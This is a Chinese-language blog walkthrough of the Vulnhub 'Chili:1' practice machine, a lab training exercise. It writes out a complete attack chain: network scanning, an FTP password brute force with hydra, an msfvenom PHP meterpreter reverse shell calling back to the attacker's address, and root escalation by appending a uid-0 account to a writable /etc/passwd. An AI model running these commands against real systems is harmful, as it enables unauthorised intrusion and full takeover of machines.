• Vulnhub靶场练习:Chili:1


    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/chili-1,558/

    2、使用VMware Workstation Pro将下载的环境文件导入到虚拟机软件

    3、为了方便练习,将网卡模式修改为桥接模式,启动即可

     

     二、靶场攻略

    1、使用命令:netdiscover -i eth0 -r 10.10.114.0/16,发现靶场的ip

     2、收集靶场的端口信息,寻找突破点,使用命令:nmap -sV -A -p- 10.10.114.5

    发现开启的端口有,21、端口

     3、访问http的端口寻找漏洞,首页只有一个图片,无其他线索

     查看首页的源码,发现一部分多余单词,像是一些名称

    4、使用命令:cewl http://10.10.114.5/ > user.txt,爬取网页并生成字典,爬取的字符只有首字母大写的用户名,自行向里面添加全小写的字符

     

    5、使用命令:hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -f -V 10.10.114.5 ftp,成功爆破处ftp账户密码

     6、使用爆破出的账号,密码成功登录ftp

     7、切换到网站目录,/var/www/html,发现可读可写可执行的.nano目录

    8、使用put命令,上传shell.php文件

    使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.114.170 LPORT=2345 R > shell.php,生成php反弹shell脚本

    使用put命令,在ftp服务器中,将shell.php上传到.nano目录中

    使用命令:chmod 777 shell.php,将shell.php赋予执行权限

     9、启动msf,使用payload为之前生成后门所用的payload,之后访问http://10.10.114.5/.nano/shell.php,顺利拿到shell

     10、下载辅助提权脚本,脚本下载连接:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

    下载之后,将linux下用来搜索扫描辅助提权的脚本,在ftp中,使用put命令上传到.nano目录,并赋予执行权限

     

     11、执行linpeas.sh脚本,发现了利用的文件为passwd文件,可写入

     12、passwd 文件有写入权限,我们可以自己写一个root权限的空密码账号进去,再用passwd写入密码来进行提权

    使用命令:/usr/bin/perl -le 'print crypt("test","test")',这个命令为使用perl脚本语言,执行crypt模块,将test加密字符串输出

     使用命令:echo "test:teH0wLIpW0gyQ:0:0:ROOT:/root:/bin/bash" >> /etc/passwd,在passwd文件中,写入test账户信息

     使用命令:su test,输入密码test,切换账户,成功提权为root

     完

  • 相关阅读:
    css
    js
    css3
    css
    深浅拷贝
    index-数据结构/算法
    es6知识点
    在vscode中配置sass savepath
    计算机基础
    element-ui使用后手记
  • 原文地址:https://www.cnblogs.com/sym945/p/13723537.html
Copyright © 2020-2023  润新知